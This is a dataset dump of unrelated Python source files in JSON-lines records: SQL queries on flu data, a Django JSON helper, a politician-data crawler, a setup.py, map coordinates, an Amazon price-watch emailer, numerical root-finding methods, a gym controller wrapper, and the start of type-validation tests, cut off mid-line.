cursor:\r\n cursor.execute(\"SELECT DISTINCT YEAR(Date) FROM WORLDFLUDATABASE.FLUDATA WHERE UnitedStates>1000\")\r\n connection.commit()\r\n\r\n#### Q3 ####\r\n with connection.cursor() as cursor:\r\n cursor.execute(\"SELECT DISTINCT YEAR(Date) FROM WORLDFLUDATABASE.FLUDATA WHERE UnitedStates > (Argentina +Australia+Austria+Belgium+Bolivia+Brazil+Bulgaria+Canada+Chile+France+Germany+Hungary+Japan+Mexico+Netherlands+NewZealand+Norway+Paraguay+Peru+Poland+Romania+Russia+SouthAfrica+Spain+Sweden+Switzerland+Ukraine+UnitedStates+Uruguay)/29\")\r\n connection.commit()\r\n\r\n#### Q4 ####\r\n with connection.cursor() as cursor:\r\n cursor.execute(\"SELECT * FROM WORLDFLUDATABASE.FLUDATA PROCEDURE ANALYSE()\")\r\n connection.commit()\r\n\r\n#### Q5 ####\r\n with connection.cursor() as cursor:\r\n cursor.execute(\"SELECT * FROM WORLDFLUDATABASE.FLUDATA PROCEDURE ANALYSE()\")\r\n\r\nfinally:\r\n connection.close()\r\n#data2=pd.dataframe(data1)\r\ndata_file.close()\r\n\r\n","sub_path":"IE590 HW9 SQL codes for flu data/Flu - Copy.py","file_name":"Flu - Copy.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"27306033","text":"import datetime\nimport decimal\nimport json\nimport logging\n\nfrom django.db.models.fields.files import ImageFieldFile\nfrom django.http import HttpResponse\n\n# Encode our different classes into json\nfrom django.conf import settings\n\nlogger = logging.getLogger(__name__)\n\n\nclass DefaultJSONEncoder(json.JSONEncoder):\n\tdef default(self, o):\n\n\t\tif isinstance(o, datetime.time):\n\t\t\treturn o.strftime(\"%I:%M %p\")\n\t\tif isinstance(o, datetime.datetime):\n\t\t\treturn o.strftime(\"%Y-%m-%dT%H:%M:%S.%s%z\")\n\t\tif isinstance(o, datetime.date):\n\t\t\treturn o.strftime(\"%Y-%m-%d\")\n\t\tif isinstance(o, decimal.Decimal):\n\t\t\t# http://stackoverflow.com/a/1960649/1163156\n\t\t\t# wanted a simple yield str(o) in the next line,\n\t\t\t# but that would mean a yield on the line with super(...),\n\t\t\t# which wouldn't work (see my comment below), so...\n\t\t\treturn float(o)\n\t\tif isinstance(o, ImageFieldFile):\n\t\t\tif o:\n\t\t\t\treturn settings.MEDIA_URL + '/' + o.path\n\t\t\telse:\n\t\t\t\treturn None\n\t\tif isinstance(o, float):\n\t\t\treturn (str(o) for o in [o])\n\n\t\treturn str(o)\n\n\ndef composeJsonResponse(code, message, data):\n\treturnStatus = {'code': code, 'message': message}\n\treturnMsg = {'status': returnStatus, 'response': data}\n\n\treturnDataType = 'application/json'\n\ttry:\n\t\treturnDataString = json.dumps(returnMsg, cls=DefaultJSONEncoder)\n\t\tx = type(returnDataString)\n\texcept Exception as exc:\n\t\tlogger.error(exc)\n\n\t\treturnStatus = {'code': 500, 'message': 'Can not encode return data.'}\n\t\treturnMsg = {'status': returnStatus, 'response': ''}\n\t\treturnDataString = json.dumps(returnMsg, cls=DefaultJSONEncoder)\n\n\treturn HttpResponse(returnDataString, content_type=returnDataType)\n","sub_path":"api_helpers.py","file_name":"api_helpers.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"648905282","text":"from opensanctions.util import EntityEmitter\n\n\ndef index(context, data):\n with context.http.rehash(data) as res:\n for country in res.json:\n for legislature in country.get('legislatures', []):\n context.emit(data={\n \"country\": country,\n \"legislature\": legislature,\n \"url\": legislature.get('popolo_url'),\n })\n\n\ndef parse(context, data):\n emitter = EntityEmitter(context)\n country = data.get('country', {}).get('code')\n with context.http.rehash(data) as res:\n persons = {}\n for person in res.json.get('persons', []):\n ep_id, ftm_id = parse_person(emitter, person, country)\n persons[ep_id] = ftm_id\n\n organizations = {}\n for organization in res.json.get('organizations', []):\n ep_id, ftm_id = parse_organization(emitter, organization, country)\n organizations[ep_id] = ftm_id\n\n for membership in res.json.get('memberships', []):\n parse_membership(emitter, membership, persons, organizations)\n emitter.finalize()\n\n\ndef parse_person(emitter, data, country):\n person_id = data.pop('id', None)\n person = emitter.make('Person')\n person.make_id(person_id)\n person.add('name', data.pop('name', None))\n person.add('alias', data.pop('sort_name', None))\n person.add('gender', data.pop('gender', None))\n person.add('title', data.pop('honorific_prefix', None))\n person.add('title', data.pop('honorific_suffix', None))\n person.add('firstName', data.pop('given_name', None))\n person.add('lastName', data.pop('family_name', None))\n person.add('fatherName', data.pop('patronymic_name', None))\n person.add('birthDate', data.pop('birth_date', None))\n person.add('deathDate', data.pop('death_date', None))\n person.add('email', data.pop('email', None))\n person.add('summary', data.pop('summary', None))\n person.add('keywords', ['PEP', 'PARL'])\n\n for other_name in data.pop('other_names', []):\n person.add('alias', other_name.get('name'))\n\n for identifier in data.pop('identifiers', []):\n if 'wikidata' == identifier.get('scheme'):\n person.add('wikidataId', identifier.get('identifier'))\n\n for link in data.pop('links', []):\n if 'Wikipedia' in link.get('note'):\n person.add('wikipediaUrl', link.get('url'))\n\n for contact_detail in data.pop('contact_details', []):\n if 'email' == contact_detail.get('type'):\n person.add('email', contact_detail.get('value'))\n if 'phone' == contact_detail.get('type'):\n person.add('phone', contact_detail.get('value'))\n\n # data.pop('image', None)\n emitter.emit(person)\n return person_id, person.id\n\n\ndef parse_organization(emitter, data, country):\n org_id = data.get('id')\n if data.get('name') == 'unknown':\n return org_id, None\n\n organization = emitter.make('Organization')\n organization.make_id(org_id)\n organization.add('name', data.get('name'))\n organization.add('summary', data.get('type'))\n organization.add('country', country)\n\n for identifier in data.get('identifiers', []):\n if 'wikidata' == identifier.get('scheme'):\n organization.add('wikidataId', identifier.get('identifier'))\n\n emitter.emit(organization)\n return org_id, organization.id\n\n\ndef parse_membership(emitter, data, persons, organizations):\n person_id = persons.get(data.get('person_id'))\n organization_id = organizations.get(data.get('organization_id'))\n on_behalf_of_id = organizations.get(data.get('on_behalf_of_id'))\n\n if person_id and organization_id:\n membership = emitter.make('Membership')\n membership.make_id(person_id, organization_id)\n membership.add('member', person_id)\n membership.add('organization', organization_id)\n membership.add('role', data.get('role'))\n\n for source in data.get('sources', []):\n membership.add('sourceUrl', source.get('url'))\n\n emitter.emit(membership)\n\n if person_id and on_behalf_of_id:\n membership = emitter.make('Membership')\n membership.make_id(person_id, on_behalf_of_id)\n membership.add('member', person_id)\n membership.add('organization', on_behalf_of_id)\n\n for source in data.get('sources', []):\n membership.add('sourceUrl', source.get('url'))\n\n emitter.emit(membership)\n","sub_path":"opensanctions/crawlers/everypolitician.py","file_name":"everypolitician.py","file_ext":"py","file_size_in_byte":4434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"494033478","text":"\"\"\"\nWOFpy\n-------\n\nWOFpy is a python library for serving CUAHSI's WaterOneflow web services\n\nCUAHSI is the Consortium of Universities for the\nAdvancement of Hydrologic Science, Inc.\n\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function)\n\nimport codecs\nimport os\nimport re\n\nfrom setuptools import find_packages, setup\n\nimport versioneer\n\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n\ndef read(*parts):\n return codecs.open(os.path.join(here, *parts), 'r').read()\n\n\n# Dependencies.\nwith open('requirements.txt') as f:\n requirements = f.readlines()\ninstall_requires = [t.strip() for t in requirements]\n\nsetup(\n name='WOFpy',\n version=versioneer.get_version(),\n license='BSD',\n author='James Seppi',\n author_email='james.seppi@gmail.com',\n # note: maintainer gets listed as author in PKG-INFO, so leaving\n # this commented out for now\n maintainer='Emilio Mayorga',\n maintainer_email='emiliom@uw.edu',\n description='a python library for serving WaterOneFlow web services',\n long_description=__doc__,\n keywords='cuahsi his wofpy water waterml cuahsi wateroneflow odm2',\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n platforms='any',\n install_requires=install_requires,\n extras_require={\n 'odm1': ['sqlalchemy', 'pyodbc'],\n 'odm2': ['sqlalchemy', 'odm2api'],\n 'sqlite': ['sqlalchemy'],\n 'server': ['uwsgi'],\n },\n tests_require=['suds-jurko', 'requests'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ],\n entry_points=dict(console_scripts=[\n 'wofpy_config = wof.wofpy_config:main'\n ]\n ),\n cmdclass=versioneer.get_cmdclass(),\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"203495239","text":"import utm\nimport math\n\n\nclass MapCoords(object):\n\n def __init__(self, lat, lon):\n self.lat =lat\n self.lon =lon\n a = utm.from_latlon(lat, lon)\n self.northing = a[1]\n self.easting = a[0]\n self.zone_number = a[2]\n self.zone_letter = a[3]\n\n def _get_rel_point(self, easting, northing):\n a = utm.to_latlon(self.easting + easting, self.northing + northing, self.zone_number, self.zone_letter)\n return MapCoords(a[0], a[1])\n\n def __sub__(self, other):\n dnorth = self.northing - other.northing\n deast = self.easting - other.easting\n dist = math.hypot(deast, dnorth)\n orient = math.atan2(dnorth, deast) * 180/math.pi\n return dist, orient\n\n\n def __mod__(self, other):\n dnorth = ((self.northing + other.northing)/2)\n deast = ((self.easting + other.easting)/2)\n a = utm.to_latlon(deast, dnorth, self.zone_number, self.zone_letter)\n return MapCoords(a[0], a[1]) \n \n# print dnorth, deast\n# midpoint = self._get_rel_point(deast, dnorth)\n# return midpoint\n\n\n def __repr__(self):\n a = dir(self)\n b = []\n s = ''\n for i in a:\n if not i.startswith('_'):\n b.append(str(i))\n for i in b:\n s = s + str(i) + ': ' + str(self.__getattribute__(i)) + '\\n'\n return s\n\n\ndef coord_from_satnav_fix(msg):\n a = MapCoords(msg.latitude, msg.longitude)\n return a\n","sub_path":"kriging_exploration/src/kriging_exploration/map_coords.py","file_name":"map_coords.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"369751392","text":"from bs4 import BeautifulSoup\nfrom requests_html import HTMLSession\nimport os\nimport time\nimport smtplib , ssl\nimport requests\n\nclass Scraper:\n\n #Initializes the scraper shopping bot\n def __init__(self,url,budget,u_email):\n\n #Attributes about product\n self.url = url\n self.budget = budget\n\n #Setting user email\n self.u_email = u_email\n\n #Attributes about scraping\n self.session = HTMLSession()\n # specifying user agent, You can use other user agents\n # available on the internet\n self.HEADERS = ({'User-Agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36'})\n # Making the HTTP Request\n print(requests.get(self.url, headers=self.HEADERS))\n self.webpage = requests.get(self.url, headers=self.HEADERS)\n self.parser = 'lxml'\n self.soup = BeautifulSoup(self.webpage.content,self.parser)\n\n #Prints the object\n def __str__(self):\n return self.soup.prettify()\n\n #Stores the title of the product\n def get_title(self):\n title = self.soup.find(\"span\",\n attrs={\"id\": 'productTitle'})\n # Inner NavigableString Object\n title_value = title.string\n\n # Title as a string value\n self.product_title = title_value.strip().replace(',', '')\n return self.product_title\n\n #Stores the price of the product after filtering the string and converting it to an integer\n def get_price(self):\n try:\n price = self.soup.find(\n \"span\", attrs={'id': 'priceblock_ourprice'}).string.strip().replace(',', '')\n # we are omitting unnecessary spaces\n # and commas form our string\n except AttributeError:\n try:\n price = self.soup.find(id='priceblock_saleprice').get_text().replace('$', '').replace(',', '').strip()\n except:\n try:\n price = self.soup.find(id='newBuyBoxPrice').get_text().replace('$', '').replace(',', '').strip()\n except:\n price = 'NA'\n print(price)\n self.product_price = price.strip().replace(',', '')\n if self.product_price[0] == '$':\n self.product_price = self.product_price[1:]\n return self.product_price\n\n #Prints product title\n def print_title(self):\n print(self.product_title)\n return\n\n #Prints product price\n def print_price(self):\n print(self.product_price)\n return\n\n #Checks if the price of the product is below the budget\n def is_below_budget(self):\n if float(self.product_price) <= self.budget:\n return True\n else:\n return False\n\n #Runs the scraper\n def run(self):\n self.get_title()\n self.get_price()\n self.alert = self.is_below_budget()\n self.status = False\n if self.alert:\n self.status = self.send_email()\n return self.status\n\n #Sends an email when the condition is satisfied. Under testing!\n def send_email(self):\n\n #Attributes for email sending\n port = 587\n smtp_server = 'smtp.gmail.com'\n self.email = str(os.environ.get('DEVELOPER_MAIL'))\n self.app_pw = str(os.environ.get('DEVELOPER_PASS'))\n\n #Message details\n subject = f'The price of {self.get_title()} is within your budget!'\n\n body_start = 'Hey there!\\n\\nThe price is now within your budget. Here is the link, buy it now!\\n'\n body_mid = self.url\n body_end = '\\n\\nRegards\\nYour friendly neighbourhood programmer'\n body = str(body_start) + str(body_mid) + str(body_end)\n\n message = f\"Subject: {subject}\\n\\n{body}\"\n\n context = ssl.create_default_context()\n with smtplib.SMTP(smtp_server, port) as server:\n server.ehlo() # Can be omitted\n server.starttls(context=context)\n server.ehlo() # Can be omitted\n server.login(self.email, self.app_pw)\n server.sendmail(self.email, self.u_email, message)\n print(\"Email sent successfully!\")\n self.server.quit()\n return True\n\n\ndef main():\n url = input(\"Paste the link of the Amazon product whose price you wish to monitor:\")\n budget = int(input(\"Enter you budget price:\"))\n u_email = input(\"Enter your email:\")\n inp_str = (\"How frequuently would you like to receive updates?\"\n \"\\n1.Every hour\\n2.Every 3 hours\\n3.Every 6 hours\"\n \"\\nEnter your choice (Default choice is 6 hours):\")\n time_choice = int(input(inp_str))\n if time_choice == 1:\n time_delay = 60 * 60\n elif time_choice == 2:\n time_delay = 3 * 60 * 60\n else:\n time_delay = 6 * 60 * 60\n msg = (\"Great! Now just sit back and relax. Minimize this program and be sure \"\n \"that it is running.\\nAdditionally, ensure that there is stable internet connection \"\n \"during the time this program runs.\\nIf the price of the product falls within your budget, \"\n \"you will recieve an email regarding the same and this program will auto-close.\\nThank you for using \"\n \"Amazon-Shopping-Bot's scraper!\")\n print(msg)\n shopbot = Scraper(url,budget,u_email)\n while True:\n if shopbot.run():\n break\n time.sleep(time_delay)\n\nif __name__ == '__main__':\n main()\n","sub_path":"amazon_scraper.py","file_name":"amazon_scraper.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"552037416","text":"from sympy import *\nfrom decimal import Decimal\nclass Methods:\n\n def __init__(self, function, gunction=''):\n self.func = function\n if gunction:\n self.gunction = gunction\n\n def f(self, number):\n init_printing(use_unicode=True)\n x = symbols('x')\n fx = eval(self.func)\n function = fx.evalf(subs={x: number})\n dfx = Derivative(fx, x).doit()\n derivative = dfx.evalf(subs={x: number})\n dfx2 = Derivative(dfx, x).doit()\n derivative2 = dfx2.evalf(subs={x: number})\n return (function, derivative, derivative2)\n\n def g(self, number):\n x = symbols('x')\n gx = eval(self.gunction)\n return gx\n\n def bisection(self, xi, xs, tolerance, iterations):\n # table = PrettyTable(['Iteration', 'Xinf', 'Xsup', 'Xmi', 'f(Xmi)', 'Error'])\n fxi = self.f(xi)[0]\n fxs = self.f(xs)[0]\n root = 0\n rows = [['Iteration', 'Xinf', 'Xsup', 'Xmi', 'f(Xmi)', 'Error']]\n if fxi == 0:\n root = xi\n elif fxs == 0:\n root = xs\n elif fxi * fxs < 0:\n xm = (xi + xs) / 2\n fxm = self.f(xm)[0]\n cont = 1\n error = tolerance + 1\n row = [cont, xi, xs, xm, fxm, 'Doesnt exist']\n # table.add_row(row)\n rows.append(row)\n while error > tolerance and fxm != 0 and cont < iterations:\n if fxi * fxm < 0:\n xs = xm\n fxs = fxm\n else:\n xi = xm\n fxi = fxm\n aux = xm\n xm = (xi + xs) / 2\n fxm = self.f(xm)[0]\n error = abs(xm - aux)\n cont += 1\n row = [cont, xi, xs, xm, fxm, '%.2E' % Decimal(str(error))]\n # table.add_row(row)\n rows.append(row)\n if fxm == 0:\n root = xm\n elif error < tolerance:\n root = (xm, '%.2E' % Decimal(str(error)))\n else:\n root = (None, iterations)\n # print(table)\n else:\n root = None\n return (root, rows)\n\n def falseRule(self, xi, xs, tolerance, iterations):\n # table = PrettyTable(['Iteration', 'Xinf', 'Xsup', 'Xmi', 'f(Xmi)', 'Error'])\n fxi = self.f(xi)[0]\n fxs = self.f(xs)[0]\n si = xi - xs\n helper = fxi - fxs\n root = 0\n rows = [['Iteration', 'Xinf', 'Xsup', 'Xmi', 'f(Xmi)', 'Error']]\n if fxi == 0:\n root = xi\n elif fxs == 0:\n root = xs\n elif fxi * fxs < 0:\n if helper != 0:\n xm = xi - ((fxi * si) / helper)\n fxm = self.f(xm)[0]\n cont = 1\n error = tolerance + 1\n # table.add_row([cont, xi, xs, xm, fxm, 'Doesnt exist'])\n rows.append([cont, xi, xs, xm, fxm, 'Doesnt exist'])\n while error > tolerance and fxm != 0 and cont < iterations:\n if fxi * fxm < 0:\n xs = xm\n fxs = fxm\n else:\n xi = xm\n fxi = fxm\n aux = xm\n si = xi - xs\n helper = fxi - fxs\n if helper == 0:\n break\n xm = xi - ((fxi * si) / helper)\n fxm = self.f(xm)[0]\n error = abs(xm - aux)\n cont += 1\n rows.append([cont, xi, xs, xm, fxm, '%.2E' % Decimal(str(error))])\n if fxm == 0:\n root = xm\n elif error < tolerance:\n root = (xm, '%.2E' % Decimal(str(error)))\n else:\n root = (None, iterations)\n print(rows)\n else:\n root = False\n else:\n root = None\n return (root, rows)\n\n def fixedPoint(self, xa, tolerance, iterations):\n table = [['Iteration', 'Xn', 'f(Xn)', 'Error']]\n fx = self.f(xa)[0]\n cont = 0\n error = tolerance + 1\n table.append([cont, xa, fx, 'Doesnt exist'])\n while fx != 0 and error > tolerance and cont < iterations:\n xn = self.g(xa)\n fx = self.f(xn)[0]\n error = abs(xn - xa)\n xa = xn\n cont += 1\n table.append([cont, xn, fx, '%.2E' % Decimal(str(error))])\n if fx == 0:\n root = xa\n elif error < tolerance:\n root = (xa, '%.2E' % Decimal(str(error)))\n else:\n root = (None, iterations)\n print(table)\n return (root, table)\n\n def incremental_searches(self, x0, delta, iterations):\n fx = self.f(x0)[0]\n root = 0\n roots = [['Roots']]\n if fx == 0:\n root = x0\n roots.append(x0)\n else:\n x1 = x0 + delta\n cont = 1\n fx1 = self.f(x1)[0]\n while cont < iterations:\n if fx1 == 0:\n root = x1\n roots.append(x1)\n elif fx * fx1 < 0:\n root = (x0, x1)\n roots.append(root)\n else:\n root = None\n x0 = x1\n fx = fx1\n x1 = x0 + delta\n fx1 = self.f(x1)[0]\n cont += 1\n return roots\n\n def multipleRoots(self, x0, tolerance, iterations):\n table = [['Iteration', 'Xn', 'f(Xn)', 'df(Xn)', 'd(2)f(Xn)', 'Error']]\n fx = self.f(x0)[0]\n dfx = self.f(x0)[1]\n dfx2 = self.f(x0)[2]\n cont = 0\n error = tolerance + 1\n table.append([cont, x0, '%.2E' % Decimal(str(fx)), '%.2E' % Decimal(str(dfx)), '%.2E' % Decimal(str(dfx2)),\n 'Doesnt exist'])\n while error > tolerance and fx != 0 and dfx != 0 and cont < iterations:\n numerator = fx * dfx\n denominator = (dfx ** 2) - (fx * dfx2)\n x1 = x0 - (numerator / denominator)\n fx = self.f(x1)[0]\n dfx = self.f(x1)[1]\n dfx2 = self.f(x1)[2]\n error = abs(x1 - x0)\n x0 = x1\n cont += 1\n table.append([cont, x1, '%.2E' % Decimal(str(fx)), '%.2E' % Decimal(str(dfx)), '%.2E' % Decimal(str(dfx2)),\n '%.2E' % Decimal(str(error))])\n\n if fx == 0:\n root = x0\n elif error < tolerance:\n root = (x1, '%.2E' % Decimal(str(error)))\n elif dfx == 0 and fx == 0 and dfx2 != 0:\n root = x1\n else:\n root = None\n print(table)\n return (root, table)\n\n def aitken(self, x0, tolerance, iterations):\n table = [['Iteration', 'Xn', 'Error Absoluto']]\n fx0 = self.f(x0)[0]\n root = 0\n if fx0 == 0:\n root = x0\n else:\n cont = 0\n error = tolerance + 1\n table.append([cont, x0, 'Doesnt exist'])\n prev = x0\n\n while cont < iterations and error > tolerance:\n x1 = self.f(x0)[0]\n x2 = self.f(x1)[0]\n\n if (x2 - x1) - (x1 - x0) == 0:\n break\n aux = x2 - (((x2 - x1) ** 2) / ((x2 - x1) - (x1 - x0)))\n if aux == 0:\n break\n error = abs((aux - prev)) # Error absoluto\n cont += 1\n table.append([cont, aux, '%.2E' % Decimal(str(error))])\n x0 = x1\n prev = aux\n\n if error < tolerance:\n root = (aux, '%.2E' % Decimal(str(error)))\n else:\n root = (None, cont)\n\n print(table)\n return (root, table)\n\n def bis(self, a, b):\n fa = self.f(a)[0]\n x = (a + b) / 2.0\n fx = self.f(x)[0]\n if (fa * fx) < 0:\n b = x\n else:\n a = x\n x = (a + b) / 2.0\n return a, b, x\n\n def aitken_bis(self, a, b, tolerance, iterations):\n table = [['Iteration', 'Xn', 'Error Absoluto']]\n x0 = (a + b) / 2.0\n fa = self.f(a)[0]\n fb = self.f(b)[0]\n fx0 = self.f(x0)[0]\n root = 0\n if fx0 == 0:\n root = x0\n elif fa == 0:\n root = a\n elif fb == 0:\n root = b\n else:\n cont = 0\n error = tolerance + 1\n table.append([cont, x0, 'Doesnt exist'])\n prev = x0\n\n while cont < iterations and (error > tolerance or error == 0):\n a1, b1, x1 = self.bis(a, b)\n a2, b2, x2 = self.bis(a1, b1)\n den = (x2 - x1) - (x1 - x0)\n if den == 0:\n print(\"The denominator became 0.\")\n break\n xn = x2 - (((x2 - x1) ** 2) / den)\n if xn == prev:\n a, b, x0 = a1, b1, x1\n prev = xn\n continue\n error = abs(xn - prev) # Error absoluto\n cont += 1\n table.append([cont, xn, '%.2E' % Decimal(str(error))])\n a, b, x0 = a1, b1, x1\n prev = xn\n\n if error < tolerance:\n root = (xn, '%.2E' % Decimal(str(error)))\n else:\n print (error)\n root = (None, cont)\n\n print(table)\n return (root, table)\n\n def muller(self, x0, x1, tolerance, iterations):\n table = [['Iteration', 'X1', 'X2', 'X3', 'Error Absoluto']]\n x2 = (x1 - x0) / 2.0 # We get the third value using bisection\n fx0 = self.f(x0)[0]\n fx1 = self.f(x1)[0]\n fx2 = self.f(x2)[0]\n root = 0\n if fx0 == 0:\n root = x0\n elif fx1 == 0:\n root = x1\n if fx2 == 0:\n root = x2\n else:\n cont = 0\n error = tolerance + 1\n table.append([cont, x0, x1, x2, 'Doesnt exist'])\n\n while cont < iterations and error > tolerance:\n h0 = x1 - x0\n h1 = x2 - x1\n if (h0 == 0) | (h1 == 0):\n print (\"h0 or h1 became 0.\")\n break\n delta0 = (fx1 - fx0) / h0\n delta1 = (fx2 - fx1) / h1\n if h1 - h0 == 0:\n print (\"h1 - h0 became 0.\")\n break\n a = (delta1 - delta0) / (h1 - h0)\n b = a * h1 + delta1\n c = fx2\n # Solving the quadratic equation\n den = 1\n if b < 0:\n den = b - sqrt(b ** 2 - 4 * a * c)\n else:\n den = b + sqrt(b ** 2 - 4 * a * c)\n x3 = x2 + (-2 * c) / den\n\n error = abs(x3 - x2) # Abs error\n cont += 1\n table.append([cont, x1, x2, x3, '%.2E' % Decimal(str(error))])\n x0 = x1\n x1 = x2\n x2 = x3\n fx0 = fx1\n fx1 = fx2\n fx2 = self.f(x3)[0]\n\n if error < tolerance:\n root = (x3, '%.2E' % Decimal(str(error)))\n else:\n if (cont == iterations):\n print (\"The method failed.\")\n root = (None, cont)\n else:\n root = (x3, '%.2E' % Decimal(str(error)))\n\n print(table)\n return (root, table)\n","sub_path":"Project/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":11621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"11476841","text":"\"\"\"An environment wrapper to convert binary to discrete action space.\"\"\"\n\"\"\"An environment wrapper to convert binary to discrete action space.\"\"\"\nimport gym\nfrom gym import Env\nfrom gym import Wrapper\n\nclass JoypadSpace(Wrapper):\n \"\"\"An environment wrapper to convert binary to discrete action space.\"\"\"\n\n # a mapping of buttons to binary values\n # _button_map = {\n # 'right': 0b10000000,\n # 'left': 0b01000000,\n # 'down': 0b00100000,\n # 'up': 0b00010000,\n # 'start': 0b00001000,\n # 'select': 0b00000100,\n # 'B': 0b00000010,\n # 'A': 0b00000001,\n # 'noop': 0b00000000,\n # }\n\n _button_list = ['B', 'noop', 'select', 'start', 'up', 'down', 'left', 'right', 'A']\n\n @classmethod\n def buttons(cls) -> list:\n \"\"\"Return the buttons that can be used as actions.\"\"\"\n return list(cls._button_map.keys())\n\n def __init__(self, env: Env, actions: list):\n \"\"\"\n Initialize a new binary to discrete action space wrapper.\n\n Args:\n env: the environment to wrap\n actions: an ordered list of actions (as lists of buttons).\n The index of each button list is its discrete coded value\n\n Returns:\n None\n\n \"\"\" \n super().__init__(env)\n assert isinstance(env.action_space, gym.spaces.MultiBinary)\n\n self.action_space = gym.spaces.Discrete(len(actions))\n # create the action map from the list of discrete actions\n self._action_map = {}\n self._action_meanings = {}\n # iterate over all the actions (as button lists)\n buttons = self._button_list #list(self._button_map.keys())\n for action, button_list in enumerate(actions):\n # the value of this action's bitmap\n arr = [0] * env.action_space.n #np.array([False] * env.action_space.n)\n # iterate over the buttons in this button list\n for button in button_list:\n arr[buttons.index(button)] = 1\n # byte_action |= self._button_map[button]\n # set this action maps value to the byte action value\n self._action_map[action] = arr\n self._action_meanings[action] = ' '.join(button_list)\n\n def step(self, action):\n \"\"\"\n Take a step using the given action.\n\n Args:\n action (int): the discrete action to perform\n\n Returns:\n a tuple of:\n - (numpy.ndarray) the state as a result of the action\n - (float) the reward achieved by taking the action\n - (bool) a flag denoting whether the episode has ended\n - (dict) a dictionary of extra information\n\n \"\"\"\n # take the step and record the output\n return self.env.step(self._action_map[action])\n\n def reset(self):\n \"\"\"Reset the environment and return the initial observation.\"\"\"\n return self.env.reset()\n\n def get_action_meanings(self):\n \"\"\"Return a list of actions meanings.\"\"\"\n actions = sorted(self._action_meanings.keys())\n return [self._action_meanings[action] for action in actions]\n\n\n\"\"\"Static action sets for binary to discrete action space wrappers.\"\"\"\n# actions for the simple run right environment\nRIGHT_ONLY = [\n ['noop'],\n ['right'],\n ['right', 'A'],\n ['right', 'B'],\n ['right', 'A', 'B'],\n]\n\n\n# actions for very simple movement\nSIMPLE_MOVEMENT = [\n ['noop'],\n ['right'],\n ['right', 'A'],\n ['right', 'B'],\n ['right', 'A', 'B'],\n ['A'],\n ['left'],\n]\n\n\n# actions for more complex movement\nCOMPLEX_MOVEMENT = [\n ['noop'],\n ['right'],\n ['right', 'A'],\n ['right', 'B'],\n ['right', 'A', 'B'],\n ['A'],\n ['left'],\n ['left', 'A'],\n ['left', 'B'],\n ['left', 'A', 'B'],\n ['down'],\n ['up'],\n]\n","sub_path":"gradius/PPO/src/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"208596802","text":"# -*- coding: utf-8 -*-\n\"\"\"Tests for annotation type hint casting.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport os.path\nimport types\nimport uuid\n\nimport pytest\nimport six\n\nfrom typingplus import Any\nimport typingplus.types as tp\n\n\ndef test_bounded_type():\n \"\"\"Test the bounded type object.\"\"\"\n with pytest.raises(TypeError):\n BoundedInt = tp.Bounded[int]\n with pytest.raises(TypeError):\n BoundedInt = tp.Bounded[int, 10:20, lambda x: x, None]\n BoundedInt = tp.Bounded[int, 10:20]\n with pytest.raises(ValueError):\n BoundedInt(5)\n assert BoundedInt(10) == 10\n assert BoundedInt(15) == 15\n assert BoundedInt(20) == 20\n with pytest.raises(ValueError):\n BoundedInt(25)\n BoundedStr = tp.Bounded[str, 1:5, len]\n with pytest.raises(ValueError):\n BoundedStr('')\n assert BoundedStr('abc') == 'abc'\n with pytest.raises(ValueError):\n BoundedStr('abcdef')\n assert str(BoundedInt) == 'typingplus.types.Bounded[int, 10:20]'\n assert tp.Bounded[Any, 10:20](15) == 15\n assert tp.Bounded['int', 20](15) == 15\n assert tp.Bounded['int', 10:](15) == 15\n\n\ndef test_length_type():\n \"\"\"Test the bounded length type object.\"\"\"\n with pytest.raises(TypeError):\n LengthBoundedStr = tp.Length[str]\n with pytest.raises(TypeError):\n LengthBoundedStr = tp.Length[str, 10:20, lambda x: x]\n LengthBoundedStr = tp.Length[str, 1:5]\n with pytest.raises(ValueError):\n LengthBoundedStr('')\n assert LengthBoundedStr('a') == 'a'\n assert LengthBoundedStr('abcde') == 'abcde'\n with pytest.raises(ValueError):\n LengthBoundedStr('abcdef')\n LengthBoundedList = tp.Length[list, 1:1]\n with pytest.raises(ValueError):\n LengthBoundedList([])\n assert LengthBoundedList([1]) == [1]\n with pytest.raises(ValueError):\n LengthBoundedList([1, 2])\n assert str(LengthBoundedStr) == 'typingplus.types.Length[str, 1:5]'\n assert tp.Length[Any, 1:5]('abc') == 'abc'\n assert tp.Length['str', 20]('abc') == 'abc'\n\n\ndef test_validation_type():\n \"\"\"Test that the validation type validates content.\"\"\"\n ValidFile = tp.Valid[os.path.isfile]\n assert ValidFile(__file__) == __file__\n with pytest.raises(TypeError):\n tp.Valid[int, int, int]\n\n\ndef test_path_types(request):\n \"\"\"Test that the supplied path validation paths work.\"\"\"\n assert tp.File(__file__) == __file__\n with 